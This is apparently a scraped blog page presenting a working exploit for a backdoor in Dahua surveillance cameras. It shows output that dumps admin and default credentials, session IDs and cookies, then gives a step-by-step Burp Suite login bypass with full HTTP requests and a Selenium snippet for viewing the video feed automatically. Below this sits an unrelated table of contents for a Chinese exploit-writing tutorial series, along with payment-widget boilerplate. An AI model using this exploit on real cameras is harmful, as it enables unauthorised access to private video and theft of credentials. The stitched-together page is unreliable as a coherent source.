exploit - dahua camera backdoor

Exploit Code

Just for security assessment. If you can exploit the dahua camera devices, username/password/cookies can be used to access camera video.

$ python exploit_dahua.py 192.168.1.103
[*] http://192.168.1.103/current_config/Account1 - 3 users
('username:', u'admin')
('password:', u'C580B3BD6C91A2349AA49B1E76DE70D3')
('session:', u'1927849572')
('session_password:', 'DBA284AF02A8108CE34F4AD38ED99B68')
('seeeion_cookie:', 'DHLangCookie30=SimpChinese;DhWebCookie=%7B%22username%22%3A%22admin%22%2C%22pswd%22%3A%22%22%2C%22talktype%22%3A1%2C%22logintype%22%3A0%7D%3B;DhWebClientSessionID=2129659796')

('username:', u'default')
('password:', u'F510910D07096DE8766775A4805FBB13')
('session:', u'826187816')
('session_password:', '9333F4C182F3F5E265ED280AA9E5DBDF')
('seeeion_cookie:', 'DHLangCookie30=SimpChinese;DhWebCookie=%7B%22username%22%3A%22default%22%2C%22pswd%22%3A%22%22%2C%22talktype%22%3A1%2C%22logintype%22%3A0%7D%3B;DhWebClientSessionID=1156207906')

How to login dahua camera with burpsuite ?

Please use the exploit.py to get username/password/sessionid/cookies , and we will use it in burpsuite.

Please access dahua default page. ex: http://192.168.1.103/.

dahua

Tamper http request with burpsuite. If you input username/password, and click the submit button. Burpsuite will receive the http request body.

POST /RPC2_Login HTTP/1.1
Host: 192.168.1.103
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Referer: http://192.168.1.103/
X-Requested-With: XMLHttpRequest
X-Request: JSON
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 102
Cookie: DHLangCookie30=SimpChinese
Connection: close

{"method":"global.login","params":{"userName":"admin","password":"","clientType":"Web3.0"},"id":10000}

Send the request in burpsuite. Burpsuite will handle the second http request as follow. Please attention here, we need to replace the following parts:

  • Cookie
  • Post body - session
  • Post body - password
POST /RPC2_Login HTTP/1.1
Host: 192.168.1.103
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Referer: http://192.168.1.103/
X-Requested-With: XMLHttpRequest
X-Request: JSON
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 154
Cookie: <****replace-here****>
Connection: close

{"method":"global.login","session":<****replace-here****>,"params":{"userName":"admin","password":"<****replace-here****>","clientType":"Web3.0"},"id":10000}

and then everything goes well. We’ll see the camera monitor panel.

dahua camera

If you want to view the video automatically, please try yourself:

from selenium import webdriver


wdpath = "/path/to/chrome_webdriver"
chrome = webdriver.Chrome(wdpath)
chrome.add_cookie(cookies)
chrome.get('http://{}/'.format(host))

References

  1. http://www.freebuf.com/news/128963.html
  2. http://seclists.org/fulldisclosure/2017/Mar/9
  3. https://ipvm.com/reports/dahua-backdoor?code=bash
Exploit 编写系列教程 译序............................................................................................................................................2 Exploit 编写系列教程第一篇:栈溢出...............................................................................3 Exploit 编写系列教程第二篇:跳至 ShellCode............................................................25 Exploit 编写系列教程第三篇 a:基亍 SEH 的 Exploit.................................................54 Exploit 编写系列教程第三篇 b:基亍 SEH 的 Exploit—又一个实例........................77 Exploit 编写系列教程第四篇:编写 Metasploit Exploit.............................................83 Exploit 编写系列教程第五篇:利用调试器模块及插件加速 exploit 开发.................94 Exploit 编写系列教程第六篇:绕过 Cookie,SafeSeh,HW DEP 和 ASLR..............126 Exploit 编写系列教程第七篇:编写 Unicode Exploit................................................218 Exploit 编写系列教程第八篇:Win32 Egg Hunting..................................................256 Exploit 编写系列教程第九篇:Win32 Shellcode 编写入门......................................316 Exploit 编写系列教程第十篇:利用 ROP 绕过 DEP.....................................................432 附录 A:对《基亍栈的溢出》一文的补充.......................................................................509 附录 B:对《编写 unicode exploit》一文的补充........................................................511
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值